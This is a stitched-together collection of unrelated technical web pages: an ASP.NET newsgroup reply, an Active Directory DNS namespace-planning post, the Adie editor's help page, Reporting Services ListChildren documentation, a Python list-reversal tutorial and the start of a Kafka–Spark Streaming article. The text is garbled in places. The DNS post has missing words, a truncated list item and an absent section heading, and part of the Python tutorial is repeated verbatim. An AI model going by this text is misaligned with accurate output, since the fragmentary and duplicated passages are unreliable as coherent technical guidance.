(meaning that they are singleton objects that >> don't require a class instance to operate), or they can be Instance >> (meaning that an instance of the class containing them must be created >> in order to use them). The advantage to Shared data and process is >> that it doesn't require a class instance, and is, in essence "global," >> available to the entire application. This is also the disadvantage of >> Shared data and process. Anything can get to it, and change it, and in >> a multi-threaded app (unlike VB 6, .net is multi-threaded), this can >> cause all sorts of problems. Unless you're familiar with the issues, I >> would stick with classes that require instantiation. Instantiation is >> the process of creating a copy (instance) of a class that is limited >> in its scope (availability), and is thread-safe. >> >> Once you create an instance of a class, you can access any Public or >> Friend (Friend is more protected than Public, but you shouldn't run >> into issues right away) members from any other class that references >> the instance. >> >> From your question, and the code you posted, I can see that you >> require a good bit more education and practice. I would recommend the >> .Net SDK, a free download from: >> >> >> -4070-9F41-A333C6B9181D&displaylang=en >> >> It is extremely important to know the difference between ASP and >> ASP.Net, between VBScript or VB 6, and VB.Net. The first are >> procedural, single-threaded, and easy to use for small applications. 
>> .Net is object-oriented, multi-threaded, and easy to use once you
>> spend a great deal of time studying it, but incredibly hard to use if
>> you don't.
>>
>> Kevin Spencer
>> Microsoft MVP
>> .Net Developer
>> Everybody picks their nose,
>> But some people are better at hiding it.
>> "bienwell" <bienwell@xxxxxxxxxxx> wrote in message
>> news:O7QlcGdnFHA.1480@xxxxxxxxxxxxxxxxxxxxxxx
>>
>>> Hi,
>>>
>>> I have a question about file included in ASP.NET. I have a file
>>> that includes all the Sub functions (e.g. FileFunct.vb). One of the
>>> functions in this file is :
>>>
>>> Sub TestFunct(ByVal strInput As String)
>>>     return (strInput & " test")
>>> End Sub
>>>
>>> I'd like to call this function in FileFunct.vb from another .ASPX
>>> file like this :
>>>
>>> <%@ import Namespace="System" %>
>>> <%@ import Namespace="System.Data" %>
>>> <html>
>>> <head>
>>> <title>Test page</title>
>>> </head>
>>> <body>
>>> <script runat="server" language="VB" scr="FileFunct.vb" >
>>> Sub Page_Load(s As Object, e As EventArgs)
>>>     Dim result=TestFunct("This is a string")
>>>     response.write("<BR>result ==> " & result)
>>> End Sub
>>> </script>
>>> </body>
>>> </html>
>>>
>>> I've got this error:
>>>
>>> Server Error in '/' Application.
>>> ----------------------------------------------------------------------------
>>>
>>> Compilation Error
>>> Description: An error occurred during the compilation of a resource
>>> required to service this request. Please review the following specific
>>> error details and modify your source code appropriately.
>>> Compiler Error Message: BC30451: Name 'TestFunct' is not declared.
>>>
>>> Source Error:
>>>
>>> Line 18: Sub Page_Load(s As Object, e As EventArgs)
>>> Line 19:
>>> Line 20: Dim result=TestFunct("This is a string")
>>> Line 21: response.write("<BR>Result ==> " & Result)
>>> Line 22:
>>>
>>> I have a single .ASPX file and I don't use Visual Studio .NET in this
>>> case. Can I do that ?
>>> Thanks in advance.

- References:
- Re: How to call a Sub function from .ASPX file ?
- From: Kevin Spencer
- Re: How to call a Sub function from .ASPX file ?
- From: tom pester
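A minimal sketch of the class-based approach Kevin describes, with illustrative names (this is not code from the thread): the routine moves into a class and is exposed as a Shared member, so any page can call it without creating an instance.

' FileFunct.vb - hypothetical class wrapper for the helper routine
Public Class TextUtilities
    ' Shared: callable as TextUtilities.TestFunct(...) with no instance
    Public Shared Function TestFunct(ByVal strInput As String) As String
        Return strInput & " test"
    End Function
End Class

' In the page:
' Sub Page_Load(s As Object, e As EventArgs)
'     Dim result As String = TextUtilities.TestFunct("This is a string")
'     Response.Write("<BR>result ==> " & result)
' End Sub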
http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.framework.aspnet/2005-08/msg01844.html
crawl-002
en
refinedweb
Re: How to use sub-domain - From: "Todd J Heron" <todd_heron(delete)@hotmail.com> - Date: Sun, 23 Oct 2005 01:07:24 -0400 AD/DNS Namespace Planning - The Standard Three Options with Advantages/Disadvantages Can't decide on domain.com or domain.local for your AD domain? There are three differing views to this classic question and while they ultimately depend upon company preference, much of the direction will be driven by administrator experience. The three basic options outlined below are the most commonly-given answers to the question, and some companies use a combination of these scenarios. When explaining these to a relative beginner, many advanced AD/DNS administrators routinely their reasoning from their responses, but the explanations that follow contain detailed pros and cons of each. Option #1: Same internal and external DNS domain name. The administrator maintains entirely separate DNS implementations (no zone transfers, etc.), where the internal AD/DNS domain has manually configured static records (web, mail, etc..) to get to frequently used IP hosts in the public DNS zone of the same name . Name resolution trap: If one is not careful, setting the internal AD domain to the same name as the external (public) DNS domain name will have the following consequences for internal AD users if their client machine's DNS settings are pointing to the external namespace DNS servers: Inability to access the public website, slow network logons, no group policy updates. 2. Administrative overhead: Any changes made to the public DNS zone (such as the addition or removal of an important IP host such as a web server, mail server, or VPN server) must also be changed manually in the internal AD/DNS zone if internal users will be accessing these hosts from inside the network perimeter (a common circumstance). 3. VPN resolution: scenario: --------------------------------------------------------------------------------------- Option #2: Delegated subdomain. This is subdomain of the public DNS zone. For example, externaldnsdomain.com and subdomain.externaldnsname.com. Advantages: 1. Security: Like Option #1, this method also isolates the internal company network (please note that this is also a disadvantage due to a longer DNS namespace (see note under 'Disadvantages' below). 2. Administration: DNS records for the public DNS zone do not need to be manually duplicated into the internal AD/DNS zone. 3. DNS resolution: Internal company (Active Directory) clients can resolve external resources in the public DNS zone easily, once proper DNS name resolution mechanisms such as forwarding, secondary zones, or delegation zones are set up. 4. VPN resolution: VPN clients accessing the internal company network from the Internet can easily navigate into the internal subdomain. It is very reliable as long as the VPN stays connected. Disadvantages: 1. Longer DNS namespace: This may not look appealing (or "pretty") to the end-users. 2. Security: While there is security in an isolated subdomain, there is a potential for exposure to outside attack, albeit extremely limited.. Hackers could use this information to gather information about your network. To the extent, however, that internal networks are only accessible to the outside world via VPN (and/or exists within a non-Internet routable IP range) then this scenario is not a security disadvantage. The scenario. For the internal domain, you can use any extension you want, such as .ad, int, .lan, etc... 
This option is usually best for beginners because it's the easiest to implement - primarily because it prevents name space conflicts from the very beginning with the public domain and requires no further action. But this option does make VPN resolution difficult (like Option #1) and, Exchange message headers will show the company internal AD name which looks unprofessional. Advantages: 1. Easy setup. This method is the easiest to setup. DNS namespace collisions are avoided from the beginning. The internal AD domain will never conflict with any public domain. Disadvantages: 1. Non-FQDN resolution. Internet Explorer and simply types "server1" in the address bar (as often happens), then which "server1" is really the correct answer? The answer may not be what the user was looking for, and it will be based off of the configuration settings of the following: DNS settings under the client's TCP/IP properties, the DNS suffix search order, WINS forwarding, domain membership, and whether or not it is using a proxy server. 2. VPN resolution. VPN clients may encounter problems when trying to access internal resources. Newer VPN clients, such as those offered by Cisco and Nortel, once connected, provide name resolution by passing internal name servers (WINS, DNS) to the TCP/IP stack. If the VPN client cannot do this, add the host names of important internal hosts to the internal (WINS, DNS) name servers so that the VPN client will be able to resolve these names. Otherwise, you will need to use a Hosts (and Lmhosts if necessary) file, which is both manually intensive and will need to be updated whenever one of the listed IP host changes it's name or changes it's IP address, which happens often in an enterprise environment. For a broad overview of this entire topic, visit: DNS Namespace Planning;en-us;254680 Assigning the Forest Root Domain Name Conclusion: All three approaches will have to take both security and end-user experience into perspective. This perspective is colored by company size, budget, and experience of personnel running Active Directory and the network infrastructure (mostly with respect to DNS and VPN). No single approach should be considered the best solution under all circumstances. For any host name that you wish to be able to access from both your internal network and the Internet, you need Option #1, although it is the most administratively intensive over time. If you do not select this option and go with Option #2 or #3 only, then consideration will have to be given to the fact that company end-users will need to be trained on using different names under different circumstances based on where they are - at work, at home or on the road. -- Todd J Heron, MCSE Windows Server 2003/2000/NT; CCA ---------------------------------------------------------------------------- This posting is provided "as is" with no warranties and confers no rights <jonathanm@xxxxxxxxxxx> wrote in message news:1129862550.011564.32240@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx I saw this post on this group: In my opinion best choice would be to take a sub-zone of your registered domain name (e.g. you have registered domain name company.us. For internal use make a sub-zone e.g. named ad.company.us or lan.company.us or loca.company.us ...). Try to avoid name company.local or similar.... While it goes against common convention for Server 03, it does appeal to me for various reasons including the support of Macs on my network. Can someone explain how this works? Do I need to contact my ISP or domain registrar? 
Details please!

Regards,
MDJ

- References:
- How to use sub-domain
- From: jonathanm
http://www.tech-archive.net/Archive/Windows/microsoft.public.windows.server.general/2005-10/msg00677.html
crawl-002
en
refinedweb
You can quickly navigate to the desired file by typing the first few letters of the filename and then pressing Enter (Return); use Backspace to move up one directory level. Control-H moves to your home directory, Control-W moves back to the current working directory. A nice convenience of the File Dialog is the ability to set bookmarks, so once bookmarked, you can quickly move back to a previously visited directory. #include "filname.h" or: #include. Adie can also take advantage of a wheel mouse; simply point the mouse inside the text area and use the wheel to scroll it up and down. Holding the Control-key while operating the wheel makes the scrolling go faster, by smoothly scrolling one page at a time. To scroll horizontally, simply point the mouse at the horizontal scroll bar. In fact, any scrollable control (including the File/Directory Browser), can be scrolled by simply pointing the cursor over it and using the mouse wheel. You can adjust the number of lines scrolled for each wheel notch by means of the Preferences dialog. You can change font by invoking the Font Selection Dialog from the Font menu. The Font Dialog displays four list boxes showing the font Family, Weight, Style, and Size of each font. You can narrow down the number of fonts displayed by selecting a specific character set, setwidth, pitch, and whether or not scalable fonts are to be listed only. The All Fonts checkbutton causes all fonts to be listed. Use this feature if you need to select old-style X11 bitmap fonts. The Preview window shows a sample of text in the selected font. The colors subpane allows you to change the colors used in the File/Directory browser, and the Text Window. You can simply drag colors from one color well to another, or you can double-click on a color well and bring up the Color Dialog. The Color Dialog offers a number of ways to create a new color, either by selecting one of the pre-defined color wells, by mixing a custom color in RGB, HSV, or CMYK color space, or by selecting a named color from a list. The active text line, i.e. the line containing the cursor, can be drawn using a special style when the Active background button is checked. If Line Numbers are displayed, the line numbers and line numbers background can also be modified. The editor subpane is used to change various modes of the editor: patternname (patternlist) Where patternname is the name of the pattern (e.g. "C Source") and the patternlist is a comma separated list of patterns (for example "*.h,*.c"). The patternname is optional. Some examples from my own setup of Adie (you can paste these from this help window if you want) are shown below: All Files (*) All Source (*.cpp,*.cxx,*.cc,*.C,*.c,*.hpp,*.hxx,*.hh,*.H,*.h,*.y,*.l) C++ Source Files (*.cpp,*.cxx,*.cc,*.c,*.C) C++ Header Files (*.h,*.hpp,*.hxx,*.hh,*.H) C Source Files (*.c) C Header Files (*.h) Python Files (*.py) Perl Files (*.pl) Ruby Files (*.rb) Lex (*.l) Yacc (*.y) Object (*.o) X Pixmap (*.xpm) X Bitmap (*.xbm) Some details on the allowable wild-card patterns: The syntax file contains a number of Language-blocks; each language block contains a number of syntax rules. Each rule may also contain a subrule. The order of the rules inside a Language-block is important; during matching, the first rule is tried first, then the second, and so on. With subrules, its the same way. The formal syntax for the syntax file (sic!) 
is as follows: SYNTAXFILE : { LANGUAGEBLOCK } ; LANGUAGEBLOCK : language STRING { DECLARATION } { RULE } end ; DECLARATION : filesmatch STRING | contentsmatch STRING | delimiters STRING | contextlines NUMBER | contextchars NUMBER ; RULE : rule STRING { PATTERN } { RULE } end ; PATTERN : pattern STRING | openpattern STRING | closepattern STRING | stoppattern STRING ; STRING : "text" ; NUMBER : digits ; In a string, a quote (") can be embedded by prefixing with an backslash (\). Each statement must be on a single line. A hash (#) sign is used to introduce a comment, which extends to the end of the line. To determine which language block to use for coloring, Adie first examines the wildcards in the filesmatch string. If the filename loaded into the editor matches the list of wildcards, the language block will be used for syntax coloring. Some files don't have any file extensions. In that case, you can instead determine which language block to use by matching the first fragment of the file (typically 512 characters) to the contentsmatch regular expression. Note that the order of the language blocks is important; earlier language blocks will be tried first. The delimiters expression holds the list of characters used as delimiters when editing files of this syntax. When the editor matches patterns for syntax incremental syntax coloring, it needs a certain amount of context around the change being made to the text. Typically, the contextchars should be set to the length of the largest pattern to be matched. The contextlines should be set to the number of lines of context. If these statements are omitted, Adie assumes the context to be one line of text. This is good in most cases. Syntax rules are named patterns. The name of the rule is used to look up the corresponding colors in the FOX registry (so make sure the names are legal registry key names!). Thus, the colors can be easily configurable. Rules may be either simple rules or complex rules. Simple rules match a single regular expression pattern and have no subrules. Complex rules have a openpattern and a closepattern, and possibly a stoppattern. Complex rules may have any number of subrules. The matching process is recursive, depth-first. That means, when matching complex rules, first the open pattern is matched, then all of the subrules, followed by the close pattern and stop pattern [if specified]. This allows for easy to create subpatterns e.g. backslash-escape codes [see example]. The patterns are specified using the perl-like regular expressions also used for search and replace, see above. As an example, here is a somewhat simplified version of the C++ language patterns: language "C++" # File patterns for this language mode filesmatch "*.C,*.cpp,*.cc,*.cxx,*.c++,*.H,*.hpp,*.hh,*.h++,*.h" # Word delimiters delimiters "~.,/\`'!@#$%^&*()-=+{}|[]\":;<>?" # C++ style comment rule "CPPComment" openpattern "//" # Start of C++ comment closepattern "$" # Goes to end of line end # C style comment rule "CComment" openpattern "/\*" # Note the '\' does not have to be escaped unless followed by " closepattern "\*/" # CComment pattern is potentially expensive as it can go till end of buffer! end # String rule "String" openpattern "\"" # Opening quotes closepattern "\"" # Closing quotes stoppattern "$" # Don't scan past end of line! rule "OctalEscape" # Octal character can have more than 1 character; pattern "\\d+" # that's why this rule MUST come before "ControlEscape"! 
end rule "ControlEscape" # Allow an escape; subrules are matched first pattern "\\." # so a escaped closing quote is not seen by the "String" rule end end # Char constant rule "Char" openpattern "'" closepattern "'" rule "OctalEscape" pattern "\\d+" end rule "ControlEscape" pattern "\\." end end # Preprocessor rule "Preprocessor" openpattern "^\s*#" closepattern "$" rule "PreprocessorContinuation" pattern "\\n" end end rule "Keyword" pattern "\<(friend|typename|explicit|typeid|for|while|if|and_so_on)\>" end rule "Number" pattern "\<((0[xX][0-9a-fA-F]+)|((\d+\.?\d*)|(\.\d+))([eE](\+|-)?\d+)?)\>" end rule "Type" pattern "\<(unsigned|signed|int|char|short|long|float|double)\>" end rule "Operator" pattern "(\+\+|\+=|\+|--|-=|->\*|->|-|==|=|&&)" end end [SETTINGS] typingspeed=800 clickspeed=400 scrollspeed=80 scrolldelay=600 blinkspeed=500 animspeed=10 menupause=400 tippause=800 tiptime=3000 dragdelta=6 wheellines=1 bordercolor=black basecolor=AntiqueWhite3 hilitecolor=AntiqueWhite shadowcolor=AntiqueWhite4 backcolor=AntiqueWhite1 forecolor=black selforecolor=AntiqueWhite selbackcolor=#aea395 tipforecolor=yellow tipbackcolor=black normalfont="[lucidatypewriter] 90 700 1 1 0 1" iconpath = /usr/share/icons:/home/jeroen/icons These settings can be either placed in $HOME/.foxrc (and thus affect all FOX programs), or in $HOME/.foxrc/FoxTest/Adie (only applying to Adie). File types may be bound to a command, mime-type, and icons using statements like the one below: [FILETYPES] cpp = "/usr/local/bin/textedit %s &;C++ Source File;c_src.xpm;mini/c_src.xpm" /home/jeroen = ";Home Directory;home.xpm;mini/home.xpm;application/x-folder" defaultfilebinding = "/usr/local/bin/textedit %s &;Document;document.xpm;mini/document.xpm" defaultexecbinding = ";Application;exec.xpm;mini/exec.xpm;application/x-executable-file" defaultdirbinding = ";Folder;folder.xpm;mini/folder.xpm;application/x-folder"This example shows how the extension ".cpp" is bound to the program "textedit" and is associated with two icons, a big icon "c_src.xpm" and a small icon "mini/c_src.xpm", which are to be found in the directories determined by 'iconpath", in this case, "/usr/share/icons" or "/home/jeroen/icons". It also binds two icons "home.xpm" and "mini/home.xpm" to the home directory "/home/jeroen". Finally, it assigns icons, commands, and mime-types to unbound documents, executables, and directories, overriding the built-in icons of the FOX Toolkit.
http://fox-toolkit.org/adie.html
crawl-002
en
refinedweb
Public Function ListChildren ( _
    Item As String, _
    Recursive As Boolean _
) As CatalogItem()

public CatalogItem[] ListChildren (
    string Item,
    bool Recursive
)

public:
array<CatalogItem^>^ ListChildren (
    String^ Item,
    bool Recursive
)

public CatalogItem[] ListChildren (
    String Item,
    boolean Recursive
)

public function ListChildren (
    Item : String,
    Recursive : boolean
) : CatalogItem[]

Item: The full path name of the parent folder.
Recursive: A Boolean expression that indicates whether to return the entire tree of child items below the specified item. The default value is false.

The ListChildren method returns only child items that the user has permission to view. The items that are returned may not represent a complete list of child items of the specified parent item. If ListChildren is called on the root, it likewise returns only the items the user has permission to view.

The following code example uses the ListChildren method of the ReportingService2005 class:

using System;
using System.IO;
using System.Text;
using System.Web.Services.Protocols;
using System.Xml;
using System.Xml.Serialization;

class Sample
{
    public static void Main()
    {
        ReportingService2005 rs = new ReportingService2005();
        rs.Credentials = System.Net.CredentialCache.DefaultCredentials;

        // List the entire tree of items below the root folder.
        CatalogItem[] items = rs.ListChildren("/", true);

        foreach (CatalogItem item in items)
        {
            Console.WriteLine(item.Name);
        }
    }
}
http://technet.microsoft.com/en-us/library/microsoft.wssux.reportingserviceswebservice.rsmanagementservice2005.reportingservice2005.listchildren.aspx
crawl-002
en
refinedweb
List or array manipulation questions are quite common in coding interviews. One type of manipulation you may be asked to perform is a reversal of the list: in other words, putting the list in reverse order. In Python, we actually have a built in method which takes care of reversing a list, so your first step should definitely be to ask if you can make use of the built in reverse method.

base = [1, 2, 3, 4, 5]
base.reverse()

Even if your interviewer says, "no", you've at least demonstrated that you know this method exists. So, let's imagine the interviewer says they want to see a custom solution. How do we approach this question?

Talking Through the Problem

A big part of interview questions like this is reasoning your way through the problem. What do we have to achieve? What are the steps we'll take to achieve that goal? How do we verify that the solution works? Let's start by making this into a concrete problem, rather than something abstract. If we have the following list:

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]

What we want, is for it to end up like this:

numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1]

One perfectly valid way we might want to go about this is to remove items from the beginning of the list and tack them onto the end, until we've repeated this process as many times as items exist in the list. Another option might be to take the items from the end and repeatedly add these final items to a new list. In the list above we have 9 items, and we can figure out the length using len, which means we can use the list length as a termination condition for a loop. Python also has a method called pop which both removes an item from a list and returns it. This is clearly very handy for our situation, because we want to use this value again, probably as part of an append method. By default, pop removes the final item in a list, so we won't need to provide any arguments. Each time we get a value returned from pop, we know it's the current final value of the list, so if we repeatedly append these final values to a new list, we should end up with a list in reverse order. Using our concrete example, the first value returned by pop would be 9, so this would be the first value we append. The next pop value we append would be 8, and so on and so forth, until we reach 1, which is the final value added to our new list.

Writing the Code

Now that we've talked about the solution, the actual code isn't too challenging. We can create a new empty list called reversed_list, but we should also create a copy of the base list so that we can check against it later. Remember that pop will consume values from the original_list, so when we're finished, it will be empty. For the actual loop, we're going to keep track of the length of the original_list, which, as I just mentioned, will get consumed as we repeatedly call pop on it. We'll keep repeating the loop until there are no more items to pop. For each iteration, we get a new item returned by pop and store it in a final_item variable, which we then use as an argument to the append method we call on reversed_list.

base = [1, 2, 3, 4, 5]
original_list = list(base)
reversed_list = []

while len(original_list) > 0:
    final_item = original_list.pop()
    reversed_list.append(final_item)

Feel free to test it yourself, but this solution should work perfectly fine. If you prefer, you can make it a little shorter by removing the assignment to final_item, putting the pop method directly inside the append method.

base = [1, 2, 3, 4, 5]
original_list = list(base)
reversed_list = []

while len(original_list) > 0:
    reversed_list.append(original_list.pop())

The result works exactly the same, but you may find this less readable.

Using Black Magic

Our solution above is perfectly fine, but there are some fancy tricks you can use to solve this problem as well. One solution is using slices like so:

original_list = [1, 2, 3, 4, 5]
reversed_list = original_list[::-1]

This is a really cool solution. It's incredibly short, and it doesn't consume our original list. The problem is, this syntax tells you absolutely nothing about what it does if you don't know about slicing. Luckily our variables have names which make everything incredibly explicit, but this isn't always the case. Please don't ever use this in your actual code, at least not for lists. There is generally no excuse for using this over just using reverse. However, this trick is really useful for strings, or tuples, where you don't have nice built in methods for reversing order. If you want to learn more about how awesome slices are, take a look at our previous posts on this topic: Part 1, Part 2.

Using Sorted

There's also another one-liner solution available to us using sorted, but again, I don't recommend ever using it in the wild. One benefit that sorted has over something like the slice syntax is that it at least makes a lot of sense conceptually. We're just sorting the list into reverse order.

base = [1, 2, 3, 4, 5]
original_list = list(base)
reversed_list = sorted(original_list, key=lambda x: base.index(x), reverse=True)

Unfortunately, the implementation isn't quite that straightforward. We have to use a lambda function in order to let sorted know we want to sort based on index, rather than the values themselves. Overall, I don't think this is a good solution to the problem. Our while loop is of comparable length, and is far easier to read and understand. We could take that solution to even a Python beginner and they could figure it out relatively easily. That's not the case here.

Update: One of our readers pointed out something I'd completely overlooked in this article: lists with duplicate elements. Because the index method finds the index of the first instance of a given value, the solution using sorted will become unreliable for lists with duplicate elements. Thanks, Mark!

Testing Our Solutions

Throughout I've made sure to preserve the original list items in their original order, because this means we can test whether our solutions work. Now we just have to figure out how we do this.

Some useful things to know about lists

Lists are ordered by index, so we can talk about the content of our list by referring to an item at a given index. Given the lists we had in the beginning:

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1]

In the numbers list the item at index 0 is an integer object with the value 1, while in numbers_reversed the item at index 0 is an integer object with the value 9. We can also refer to items in a list using negative indices, where -1 refers to the last item in the sequence, -2 is the penultimate item, and -3 is the antepenultimate item, etc. For a list of length n, the first item can be accessed by using either a reference to index 0 or -n. There's also a relationship between an item's current index, and its index if the list were reversed. Knowing this will let us programmatically check the results of our list reversal.
base = [1, 2, 3, 4, 5] original_list = list(base) reversed_list = [] while len(original_list) > 0: reversed_list.append(original_list.pop()) The result works exactly the same, but you may find this less readable. Using Black Magic Our solution above is perfectly fine, but there are some fancy tricks you can use to solve this problem as well. One solution is using slices like so: original_list = [1, 2, 3, 4, 5] reversed_list = original_list[::-1] This is a really cool solution. It's incredibly short, and it doesn't consume our original list. The problem is, this syntax tells you absolutely nothing about what it does if you don't know about slicing. Luckily our variables have names which make everything incredibly explicit, but this isn't always the case. Please don't ever use this in your actual code, at least not for lists. There is generally no excuse for using this over just using reverse. However, this trick is really useful for strings, or tuples, where you don't have nice built in methods for reversing order. If you want to learn more about how awesome slices are, take a look at our previous posts on this topic: Part 1, Part 2. Using Sorted There's also another one-liner solution available to us using sorted, but again, I don't recommend ever using it in the wild. One benefit that sorted has over something like the slice syntax is that it at least makes a lot of sense conceptually. We're just sorting the list into reverse order. base = [1, 2, 3, 4, 5] original_list = list(base) reversed_list = sorted(original_list, key=lambda x: base.index(x), reverse=True) Unfortunately, the implementation isn't quite that straightforward. We have to use a lambda function in order to let sorted know we want to sort based on index, rather than the values themselves. Overall, I don't think this is a good solution to the problem. Our while loop is of comparable length, and is far easier to read and understand. We could take that solution to even a Python beginner and they could figure it out relatively easily. That's not the case here. Update: One of our readers pointed out something I'd completely overlooked in this article: lists with duplicate elements. Because the index method finds the index of the first instance of a given value, the solution using sorted will become unreliable for lists with duplicate elements. Thanks, Mark! Testing Our Solutions Throughout I've made sure to preserve the original list items in their original order, because this means we can test whether our solutions work. Now we just have to figure out how we do this. Some useful things to know about lists Lists are ordered by index, so we can talk about the content of our list by referring to an item at a given index. Given the lists we had in the beginning: numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9] numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1] In the numbers list the item at index 0 is an integer object with the value 1, while in numbers_reversed the item at index 0 is an integer object with the value 9. We can also refer to items in a list using negative indices, where -1 refers to the last item in the sequence, -2 is the penultimate item, and -3 is the antepenultimate item, etc. For a list of length n, the first item can be accessed by using either a reference to index 0 or -n. There's also a relationship between an item's current index, and its index if the list were reversed. Knowing this will let us programmatically check the results of our list reversal. 
For an item at a given negative index, its new positive index will be absolute value of the negative index (how far it is from zero) - 1. For an item at a given positive index, it's new negative index will be its current positive index plus 1, all multiplied by negative 1. Written in code, these relationships look like this. Imagine we want to check whether the index 2 (i.e. number 3 inside the list) is in the correct place once the list has been reversed: numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9] numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1] index_to_check = 2 negative_index = (index_to_check + 1) * -1 # -3 correct = numbers[index_to_check] == numbers_reversed[negative_index] print(correct) # True Creating a Test Function Using this information, we can write the following function to check everything ended up where it was supposed to go: def check_reversal(original_list, reversed_list): for index, item in enumerate(original_list): negative = (index + 1) * -1 if reversed_list[negative] != item: print(f"Element {item} was not located at the expected index") break else: print("List reversed successfully") We take in two lists as arguments, though it actually doesn't matter which order we pass them in: the reverse of the reversed list is the original list after all, so our checks should work regardless of order. We take the first list and call enumerate to grab the item and index at the same time. We convert the current positive index to the negative index we expect for the item in the reversed list and assign this values to new_neg. We perform a check to ensure the item ended up in the correct place in the new list, and break the loop if we find a misplaced item, printing a message in the console at the same time. If the loop runs to completion, the else block executes, letting us know that the list was reversed successfully. If you're not familiar with this for / else syntax, we have a short Python Snippet post on this topic, but you can also find more information in the official docs. Read our introduction to unit testing post to see how we would write tests for our list reversal function. Wrapping up Thank you for reading. I hope you've learnt something in this post! Got any questions? Tweet at us. Consider joining our Complete Python Course for more Python goodness, or check out our Automated Software Testing with Python course for a deeper focus on testing Python and web applications.
https://blog.tecladocode.com/coding-interview-problems-reversing-a-list-python/
CC-MAIN-2019-47
en
refinedweb
Video::VideoDecoder::FixedRateVideoTrack

A VideoTrack that is played at a constant rate. If the frame count is unknown, you must override endOfTrack().

#include <video_decoder.h>

Definition at line 655 of file video_decoder.h.

FixedRateVideoTrack() [inline]
Definition at line 657 of file video_decoder.h.

virtual ~FixedRateVideoTrack() [inline, virtual]
Definition at line 658 of file video_decoder.h.

getDuration() [virtual]
Get the duration of the track (starting from this track's start time). By default, this returns 0 for unknown.
Reimplemented from Video::VideoDecoder::Track.
Definition at line 591 of file video_decoder.cpp.

getFrameAtTime()
Get the frame that should be displaying at the given time. This is helpful for someone implementing seek().
Definition at line 578 of file video_decoder.cpp.

getFrameRate() [protected, pure virtual]
Get the rate at which this track is played.
Implemented in Video::AVIDecoder::AVIVideoTrack.

getFrameTime()
Get the time the given frame should be shown. By default, this returns a negative (invalid) value. This function should only be used by VideoDecoder::seekToFrame().
Reimplemented from Video::VideoDecoder::VideoTrack.
Definition at line 563 of file video_decoder.cpp.

getNextFrameStartTime()
Get the start time of the next frame in milliseconds since the start of the video.
Implements Video::VideoDecoder::VideoTrack.
Definition at line 556 of file video_decoder.cpp.
https://doxygen.residualvm.org/d3/de4/classVideo_1_1VideoDecoder_1_1FixedRateVideoTrack.html
CC-MAIN-2019-47
en
refinedweb
How and Why: Static Queries in Gatsby Themes

Static Queries are now supported in Gatsby Themes thanks to Dustin. Static Queries are useful in normal Gatsby applications for adding data like the site's title, a link to a GitHub repo, or any other site metadata defined in gatsby-config.js to the site.

import React from "react";
import { StaticQuery, graphql } from "gatsby";

const Header = ({ data }) => (
  <header>
    <h1>{data.site.siteMetadata.title}</h1>
  </header>
);

export default props => (
  <StaticQuery
    query={graphql`
      query {
        site {
          siteMetadata {
            title
          }
        }
      }
    `}
    render={data => <Header data={data} {...props} />}
  />
);

Enabling Users

In themes, Static Queries can take advantage of Component Shadowing to build up a navigation data structure and let the user override the appearance of the navigation without having to worry about how to fetch and calculate a tree from a list of Markdown.

import React from "react";
import { StaticQuery, graphql } from "gatsby";
import SideNav from "./src/components/side-nav";

export default props => (
  <StaticQuery
    query={graphql`
      query {
        allMarkdownRemark {
          edges {
            node {
              slug
              frontmatter {
                title
              }
            }
          }
        }
      }
    `}
    render={data => {
      const navItems = data.allMarkdownRemark.edges.reduce((acc, cur) => {
        // calculate nav item nested tree here
      }, []);
      return <SideNav items={navItems} {...props} />;
    }}
  />
);

Since we've put the SideNav in gatsby-theme-my-theme/src/components we've opted in to letting it be shadowed by a user of our theme. We've also saved our user from having to figure out the proper algorithm for building the navigation elements into the right data structure, which can be hard or time-consuming depending on how complex it is. A user can create a file at src/components/gatsby-theme-my-theme/side-nav.js in their site and purely worry about rendering the object they are given as a prop in their new SideNav component (a sketch of such a shadowed component appears at the end of this post). Since Static Queries are only run once, we aren't adding any extra network calls on each page load to build up this navigation structure.

Site Metadata

Static Queries in themes are also useful in the original example, to pull in site metadata. The difference is that since siteMetadata is merged between themes and the user's site (since gatsby-config.js is merged), a user can override the content returned in the query by setting a field in the siteMetadata object in their site. This can be their name in an author field, a GitHub URL to their project to construct an "edit this page on GitHub" Link component, or anything else you can think of.

// uses Static Query internally for base URL from siteMetadata
// and location.pathname for doc location per-page
<GitHubEditLink />

Fin

Static Queries are useful in regular applications and they can also be used to empower users when built into themes and theme components.
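As promised above, here is what a user's shadowed side nav might look like. This is a minimal sketch: the file path follows the shadowing convention described in the post, but the shape of each item ({ title, slug, children }) is an assumption for illustration, since the theme code above leaves the tree-building algorithm unspecified.

// src/components/gatsby-theme-my-theme/side-nav.js
import React from "react";
import { Link } from "gatsby";

// render a (possibly nested) list of nav items
// each item is assumed to look like { title, slug, children }
const renderItems = items => (
  <ul>
    {items.map(item => (
      <li key={item.slug}>
        <Link to={item.slug}>{item.title}</Link>
        {item.children && item.children.length > 0 && renderItems(item.children)}
      </li>
    ))}
  </ul>
);

const SideNav = ({ items = [] }) => <nav>{renderItems(items)}</nav>;

export default SideNav;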
https://www.christopherbiscardi.com/post/how-and-why-static-queries-in-gatsby-themes/
CC-MAIN-2019-47
en
refinedweb
Apache Kafka + Spark Streaming Integration

1. Objective

Apache Kafka and Spark Streaming together are one of the best combinations for building real-time applications. In this article, we will cover the whole concept of Spark Streaming integration with Kafka in detail and look at a Spark Streaming + Kafka example. We will discuss a receiver-based approach and a direct approach to Kafka–Spark Streaming integration, and then the advantages of the direct approach over the receiver-based one. So, let's start.

2. What is Kafka Spark Streaming Integration?

There are two approaches to configure Spark Streaming to receive data from Kafka: a receiver-based approach and a direct approach. The two approaches differ in their programming models as well as in performance characteristics and semantics guarantees. Let's study both approaches in detail.

a. Receiver-Based Approach

Here, we use a receiver to receive the data. The receiver is implemented using the Kafka high-level consumer API, and the received data is stored in Spark executors. Jobs launched by Spark Streaming then process the data.

Under the default configuration, this approach can lose data on failure. To ensure zero data loss, we additionally have to enable write-ahead logs, which synchronously save all the received Kafka data into write-ahead logs on a distributed file system. In this way, it is possible to recover all the data on failure.

